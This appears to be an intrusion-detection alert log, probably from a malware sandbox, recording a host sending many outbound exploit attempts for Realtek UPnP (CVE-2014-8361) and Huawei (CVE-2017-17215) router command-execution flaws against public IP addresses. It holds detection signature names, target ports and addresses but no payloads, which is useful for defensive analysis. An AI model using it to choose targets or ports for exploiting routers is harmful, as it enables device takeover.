                                      07/20/24-23:01:52.061339TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3836452869192.168.2.2332.82.7.154
                                      07/20/24-23:01:48.083998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3612652869192.168.2.23132.77.166.224
                                      07/20/24-23:01:24.960642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056037215192.168.2.23197.93.140.206
                                      07/20/24-23:01:50.131564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4024052869192.168.2.23104.92.73.201
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564437215192.168.2.2344.107.36.53
                                      07/20/24-23:01:14.387649TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613318052869192.168.2.2352.164.165.154
                                      07/20/24-23:01:20.110860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5773837215192.168.2.2341.233.17.165
                                      07/20/24-23:01:27.708151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459037215192.168.2.2381.184.225.73
                                      07/20/24-23:01:43.039504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5280452869192.168.2.23174.16.2.141
                                      07/20/24-23:02:09.321968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356652869192.168.2.23206.198.46.124
                                      07/20/24-23:01:03.077930TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4213052869192.168.2.23155.22.90.90
                                      07/20/24-23:01:41.299284TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613940452869192.168.2.23186.129.147.154
                                      07/20/24-23:00:59.194576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5880437215192.168.2.23157.251.206.76
                                      07/20/24-23:01:42.751824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4420852869192.168.2.23106.184.161.191
                                      07/20/24-23:01:47.951292TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25403652869192.168.2.23213.139.230.45
                                      07/20/24-23:01:43.528108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5143652869192.168.2.23203.13.28.171
                                      07/20/24-23:01:50.807258TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613542252869192.168.2.23180.65.88.44
                                      07/20/24-23:01:24.944299TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742237215192.168.2.23157.61.104.107
                                      07/20/24-23:01:47.354421TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26056652869192.168.2.2346.134.86.41
                                      07/20/24-23:01:50.949008TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616007852869192.168.2.23107.238.169.17
                                      07/20/24-23:01:41.478929TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614826852869192.168.2.2362.0.251.178
                                      07/20/24-23:01:02.046626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3625637215192.168.2.239.120.239.102
                                      07/20/24-23:01:42.979245TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613344052869192.168.2.2343.122.229.51
                                      07/20/24-23:01:47.193367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614208452869192.168.2.23147.248.255.23
                                      07/20/24-23:01:47.918473TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613828652869192.168.2.23130.218.184.181
                                      07/20/24-23:01:52.305893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4032652869192.168.2.23198.12.218.135
                                      07/20/24-23:00:57.221564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341837215192.168.2.23197.127.202.249
                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4732037215192.168.2.23157.205.157.48
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5440437215192.168.2.2341.211.68.86
                                      07/20/24-23:01:54.104766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4456252869192.168.2.2379.6.78.78
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5460837215192.168.2.23157.28.100.8
                                      07/20/24-23:01:55.863393TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24871652869192.168.2.2347.97.62.221
                                      07/20/24-23:01:43.443111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5060652869192.168.2.2390.126.99.183
                                      07/20/24-23:01:41.228794TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3308452869192.168.2.2342.245.92.167
                                      07/20/24-23:01:42.147980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797252869192.168.2.2375.161.254.133
                                      07/20/24-23:01:44.765093TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3364452869192.168.2.2339.114.224.236
                                      07/20/24-23:02:20.433034TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613614252869192.168.2.23221.47.181.83
                                      07/20/24-23:01:43.141970TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4868452869192.168.2.2377.216.216.160
                                      07/20/24-23:01:59.593869TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615988452869192.168.2.23163.245.29.116
                                      07/20/24-23:01:42.778817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4683652869192.168.2.23173.176.211.200
                                      07/20/24-23:01:10.406934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5570637215192.168.2.23143.197.81.99
                                      07/20/24-23:01:46.955966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613581452869192.168.2.2397.254.137.62
                                      07/20/24-23:02:04.640460TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614020452869192.168.2.2339.135.72.98
                                      07/20/24-23:01:08.613165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25247052869192.168.2.2374.116.148.181
                                      07/20/24-23:01:47.532849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3299252869192.168.2.23210.32.95.217
                                      07/20/24-23:01:52.701293TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25339652869192.168.2.23175.210.141.95
                                      07/20/24-23:01:34.048618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5820437215192.168.2.2341.241.253.254
                                      07/20/24-23:01:59.043868TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4160852869192.168.2.2318.255.33.143
                                      07/20/24-23:01:04.798513TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614778652869192.168.2.23115.225.187.157
                                      07/20/24-23:01:53.775275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5848452869192.168.2.23155.246.197.66
                                      07/20/24-23:01:13.331592TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615649452869192.168.2.23213.215.4.32
                                      07/20/24-23:00:57.221017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453637215192.168.2.23197.76.203.13
                                      07/20/24-23:01:08.574948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4330852869192.168.2.2391.33.144.77
                                      07/20/24-23:01:42.509003TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4807852869192.168.2.2388.171.168.15
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4963437215192.168.2.23197.238.40.139
                                      07/20/24-23:01:40.290003TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5555237215192.168.2.23197.221.226.157
                                      07/20/24-23:02:04.476708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5561652869192.168.2.23181.63.38.118
                                      07/20/24-23:01:59.063098TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25571452869192.168.2.2370.183.86.6
                                      07/20/24-23:01:04.031511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3552437215192.168.2.23197.231.152.31
                                      07/20/24-23:01:11.634077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337237215192.168.2.23150.154.154.148
                                      07/20/24-23:01:47.604425TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3738852869192.168.2.2342.29.184.117
                                      07/20/24-23:01:49.810143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3283652869192.168.2.2372.2.201.225
                                      07/20/24-23:01:53.484243TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5970652869192.168.2.23112.243.101.70
                                      07/20/24-23:01:31.974656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5535837215192.168.2.23157.16.40.52
                                      07/20/24-23:01:42.718643TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615841252869192.168.2.2385.146.42.42
                                      07/20/24-23:01:45.144955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613327252869192.168.2.23178.242.0.237
                                      07/20/24-23:01:44.670958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4282652869192.168.2.23105.232.226.131
                                      07/20/24-23:01:42.115778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613852869192.168.2.23216.159.149.17
                                      07/20/24-23:02:04.022244TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4864652869192.168.2.2350.192.76.252
                                      07/20/24-23:01:11.642449TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5594637215192.168.2.2341.208.78.115
                                      07/20/24-23:01:24.589249TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4472652869192.168.2.23111.38.32.209
                                      07/20/24-23:01:08.575986TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24345252869192.168.2.23193.14.204.18
                                      07/20/24-23:01:55.125263TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25575852869192.168.2.2327.236.237.70
                                      07/20/24-23:02:48.447183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100852869192.168.2.2336.136.49.118
                                      07/20/24-23:01:59.296959TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5815652869192.168.2.2339.202.167.253
                                      07/20/24-23:01:00.633642TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568037215192.168.2.23197.132.243.55
                                      07/20/24-23:01:44.203130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5993852869192.168.2.23194.155.182.26
                                      07/20/24-23:01:43.014738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616057652869192.168.2.23135.97.77.234
                                      07/20/24-23:01:45.179680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615836052869192.168.2.2350.123.92.219
                                      07/20/24-23:02:08.171169TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614847852869192.168.2.23151.9.73.188
                                      07/20/24-23:01:46.808111TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4734852869192.168.2.2317.182.173.35
                                      07/20/24-23:01:53.041672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3935252869192.168.2.23210.6.211.62
                                      07/20/24-23:01:05.141553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3529652869192.168.2.23133.46.67.74
                                      07/20/24-23:01:42.662837TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5592252869192.168.2.2387.76.92.180
                                      07/20/24-23:01:24.498942TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4254652869192.168.2.2389.183.176.41
                                      07/20/24-23:01:51.016560TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4411252869192.168.2.23149.8.44.5
                                      07/20/24-23:01:54.947006TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614840452869192.168.2.23174.110.120.103
                                      07/20/24-23:01:55.897722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5743852869192.168.2.2398.196.109.144
                                      07/20/24-23:01:46.319020TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24437652869192.168.2.23161.25.16.6
                                      07/20/24-23:01:02.223897TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5777652869192.168.2.23189.28.183.134
                                      07/20/24-23:01:04.779951TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750452869192.168.2.2344.181.179.103
                                      07/20/24-23:01:01.500174TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615497052869192.168.2.23176.229.44.248
                                      07/20/24-23:01:06.994337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3797837215192.168.2.2370.132.198.251
                                      07/20/24-23:01:42.778303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23894452869192.168.2.2393.78.34.12
                                      07/20/24-23:01:08.652877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23755252869192.168.2.2368.46.168.107
                                      07/20/24-23:01:20.113254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5680237215192.168.2.23202.114.113.132
                                      07/20/24-23:01:44.680845TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3779852869192.168.2.2364.111.30.226
                                      07/20/24-23:01:48.965786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5656452869192.168.2.23216.13.41.148
                                      07/20/24-23:01:21.923917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293637215192.168.2.23115.85.103.199
                                      07/20/24-23:01:57.111220TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24906252869192.168.2.235.252.81.48
                                      07/20/24-23:02:04.476708TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052452869192.168.2.23133.4.55.11
                                      07/20/24-23:01:42.935667TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3336652869192.168.2.2337.165.17.202
                                      07/20/24-23:01:57.914113TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613606652869192.168.2.2320.176.201.90
                                      07/20/24-23:01:08.572197TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4139852869192.168.2.23216.174.225.184
                                      07/20/24-23:01:31.314906TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25778652869192.168.2.235.207.112.150
                                      07/20/24-23:01:40.334933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513437215192.168.2.23197.37.97.174
                                      07/20/24-23:01:44.158709TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23883452869192.168.2.2336.18.145.215
                                      07/20/24-23:01:57.476832TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616058052869192.168.2.23138.82.75.1
                                      07/20/24-23:01:45.382207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5149452869192.168.2.2370.191.15.111
                                      07/20/24-23:01:31.981855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668237215192.168.2.23197.97.226.41
                                      07/20/24-23:01:07.033766TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3960037215192.168.2.23197.25.40.12
                                      07/20/24-23:01:20.592479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3752652869192.168.2.23151.154.71.43
                                      07/20/24-23:01:31.999991TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4310437215192.168.2.23197.255.148.186
                                      07/20/24-23:00:59.196993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4898437215192.168.2.2341.231.235.189
                                      07/20/24-23:01:57.872971TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3589652869192.168.2.23164.20.16.241
                                      07/20/24-23:01:02.127340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759437215192.168.2.23197.25.159.41
                                      07/20/24-23:01:31.318207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3303852869192.168.2.23155.220.6.134
                                      07/20/24-23:01:20.598095TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23505452869192.168.2.2373.36.171.85
                                      07/20/24-23:01:58.353725TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3406452869192.168.2.2339.235.222.86
                                      07/20/24-23:01:02.070492TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4908437215192.168.2.2341.218.249.85
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4711837215192.168.2.23197.217.22.246
                                      07/20/24-23:01:25.544921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4602452869192.168.2.23123.145.45.176
                                      07/20/24-23:01:01.432181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614215052869192.168.2.23161.98.32.121
                                      07/20/24-23:01:57.747300TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614001252869192.168.2.23134.89.250.200
                                      07/20/24-23:01:24.916250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5964437215192.168.2.2341.78.231.116
                                      07/20/24-23:01:42.608320TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24746852869192.168.2.23163.212.66.23
                                      07/20/24-23:01:02.113055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707437215192.168.2.23157.31.252.0
                                      07/20/24-23:01:44.670958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4052052869192.168.2.23186.206.154.241
                                      07/20/24-23:01:34.044223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090637215192.168.2.23203.177.111.61
                                      07/20/24-23:01:41.399866TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613410852869192.168.2.2392.1.18.107
                                      07/20/24-23:01:58.313085TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5185852869192.168.2.23199.118.63.112
                                      07/20/24-23:01:43.197088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5598652869192.168.2.232.108.114.50
                                      07/20/24-23:00:59.148144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507637215192.168.2.2341.126.20.80
                                      07/20/24-23:02:04.721025TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23895652869192.168.2.2314.187.245.173
                                      07/20/24-23:01:24.618795TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613889452869192.168.2.2339.181.226.152
                                      07/20/24-23:01:24.745266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3897852869192.168.2.2367.128.52.113
                                      07/20/24-23:01:42.048889TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25334452869192.168.2.2380.2.7.209
                                      07/20/24-23:01:31.974580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867437215192.168.2.23167.62.210.191
                                      07/20/24-23:01:48.885298TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614937252869192.168.2.23179.176.134.213
                                      07/20/24-23:01:49.084300TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4049652869192.168.2.23138.199.35.177
                                      07/20/24-23:02:11.703257TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4823852869192.168.2.23202.190.28.250
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526037215192.168.2.23157.203.255.180
                                      07/20/24-23:01:41.217142TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5928852869192.168.2.23221.195.248.226
                                      07/20/24-23:02:20.005310TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5068252869192.168.2.23154.161.89.111
                                      07/20/24-23:01:20.132510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4027237215192.168.2.23222.12.61.68
                                      07/20/24-23:01:54.808195TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23369252869192.168.2.2363.248.77.62
                                      07/20/24-23:01:43.013771TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5266852869192.168.2.23147.169.170.137
                                      07/20/24-23:01:47.979559TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613632052869192.168.2.2360.59.133.184
                                      07/20/24-23:01:04.769670TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613854052869192.168.2.23135.110.213.163
                                      07/20/24-23:01:43.203681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614390452869192.168.2.2393.0.10.232
                                      07/20/24-23:01:24.934977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068837215192.168.2.23197.22.127.255
                                      07/20/24-23:00:57.220817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4886037215192.168.2.23157.115.56.95
                                      07/20/24-23:01:31.976649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3600237215192.168.2.23137.158.184.177
                                      07/20/24-23:01:34.055714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5681037215192.168.2.2341.65.150.230
                                      07/20/24-23:01:56.400580TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5114052869192.168.2.23116.148.59.65
                                      07/20/24-23:01:48.885298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4989452869192.168.2.23136.148.234.160
                                      07/20/24-23:01:11.631728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4046637215192.168.2.2341.122.186.57
                                      07/20/24-23:01:04.039128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4838437215192.168.2.23197.85.169.251
                                      07/20/24-23:01:47.783977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4027852869192.168.2.23206.154.64.238
                                      07/20/24-23:01:41.354322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614252852869192.168.2.2319.15.33.52
                                      07/20/24-23:01:27.664606TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628837215192.168.2.2341.157.179.142
                                      07/20/24-23:01:44.839991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4978452869192.168.2.2348.216.224.125
                                      07/20/24-23:01:48.858207TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5100652869192.168.2.23212.62.106.68
                                      07/20/24-23:01:58.249114TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24694052869192.168.2.23213.9.81.218
                                      07/20/24-23:01:00.635367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.23197.209.84.96
                                      07/20/24-23:01:24.916250TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715437215192.168.2.2341.165.136.62
                                      07/20/24-23:01:47.503890TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24489652869192.168.2.23209.24.146.250
                                      07/20/24-23:01:08.939279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4968052869192.168.2.23117.49.51.0
                                      07/20/24-23:01:48.047800TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3302652869192.168.2.2363.140.14.0
                                      07/20/24-23:03:46.030378TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4114252869192.168.2.232.183.96.31
                                      07/20/24-23:01:56.300735TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5223652869192.168.2.2349.127.162.127
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358037215192.168.2.23197.181.192.91
                                      07/20/24-23:01:59.104072TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24500252869192.168.2.2323.185.211.99
                                      07/20/24-23:02:12.203120TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25595852869192.168.2.23209.233.186.203
                                      07/20/24-23:01:27.651332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990037215192.168.2.23206.228.241.87
                                      07/20/24-23:01:45.519802TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613911252869192.168.2.23223.123.26.129
                                      07/20/24-23:01:00.654988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683637215192.168.2.23197.236.128.48
